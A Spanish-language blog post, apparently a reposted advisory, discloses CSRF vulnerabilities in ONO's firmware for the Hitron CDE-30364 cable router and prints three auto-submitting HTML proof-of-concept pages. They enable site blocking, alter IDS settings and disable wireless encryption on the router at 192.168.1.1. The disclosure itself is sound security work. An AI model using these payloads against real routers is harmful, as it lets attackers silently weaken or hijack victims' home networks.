Múltiples CSRF en firmware de ONO para el router Hitron CDE-30364

Se han descubierto múltiples problemas de seguridad en el firmware proporcionado por ONO para el router Hitron CDE-30364, que permitirían a un atacante remoto realizar ataques cross-Site Request Rorgery (CSRF) y modificar la configuración del dispositivo.

El Hitron CDE-30364 es un cable-modem-router inalámbrico proporcionado
por ONO a sus clientes con conexiones de 30, 50 y 100 megas.

CSRF es una técnica que permite realizar peticiones HTTP a usuarios no
autorizados a través del aprovechamiento de algún error en la validación
de estas peticiones, o incluso la falta de dicha validación. Para
explotar estas vulnerabilidades, el atacante debe engañar a la víctima
que ha iniciado sesión en el dispositivo para que visite una página web
especialmente manipulada desde la que se realizará la petición HTTP no
autorizada y sin conocimiento del usuario legítimo.

Matias Mingorance Svensson ha descubierto múltiples vulnerabilidades
CSRF en la interfaz de administración de los dispositivos Hitron
CDE-30364 que la empresa de telecomunicaciones ONO entrega a sus
clientes. Para documentarlas ha publicado varias pruebas de concepto que
permitirían realizar modificaciones en la configuración del router. Son
las siguientes:

* Activar el bloqueo de sitios web y agregar un filtro (en este ejemplo
la palabra ‘google’):

<html>
<body onload=”javascript:document.forms[0].submit()”>
<H2></H2>
<form method=”POST” name=”form0″ action=”
http://192.168.1.1/goform/Keyword?file=parent-website&dir=admin
%2F&checkboxName=on&blockingFlag=1&blockingAlertFlag=&cfKeyWord_Domain=&cfTrusted_MACAddress=&cfTrusted_MACAddress0=
0&cfTrusted_MACAddress1=0&cfTrusted_MACAddress2=0&cfTrusted_MACAddress3=0&cfTrusted_MACAddress4=0&cfTrusted_MACAddre
ss5=0&trustedMAC=&keyword0=google”>
</body>
</html>

* Activar el sistema de detección de intrusiones (IDS):

<html>
<body onload=”javascript:document.forms[0].submit()”>
<H2></H2>
<form method=”POST” name=”form0″ action=”
http://192.168.1.1/goform/Firewall?dir=admin%2F&file=feat-
firewall&ids_mode=0&IntrusionDMode=on&rspToPing=1″>
</body>
</html>

* Dehabilitar el modo de seguridad Wireless (Wireless Security Mode):

<html>
<body onload=”javascript:document.forms[0].submit()”>
<H2></H2>
<form method=”POST” name=”form0″ action=”
http://192.168.1.1/goform/Wls?dir=admin
%2F&file=wireless_e&key1=0000000000&key2=0000000000&key3=0000000000&key4=0000000000&k128_1=0000000000000000000000000
0&k128_2=00000000000000000000000000&k128_3=00000000000000000000000000&k128_4=00000000000000000000000000&ssid_list=0&
Encrypt_type=0″>
</body>
</html>

Estas vulnerabilidades han sido comprobadas en dispositivos con firmware
3.1.0.8-ONO, aunque otras versiones también podrían verse comprometidas.

 Fuente

__________

NOTA: Los interesados en información sobre contrato de soporte Asistencia Tecnica de SATINFO y/o licencia de uso/actualizaciones de sus utilidades, contacten con info@satinfo.es
__________

Este blog no se hace responsable de las opiniones y comentarios de los textos en los que se cita la Fuente, ofreciendo su contenido solo para facilitar el acceso a la información del mismo.

Puedes seguir cualquier respuesta a esta entrada mediante el canal RSS 2.0. Los comentarios y los pings están cerrados.

Los comentarios están cerrados.

 

Uso de cookies

Este sitio web utiliza cookies para que usted tenga la mejor experiencia de usuario. Si continúa navegando está dando su consentimiento para la aceptación de las mencionadas cookies y la aceptación de nuestra política de cookies, pinche el enlace para mayor información.

ACEPTAR
Aviso de cookies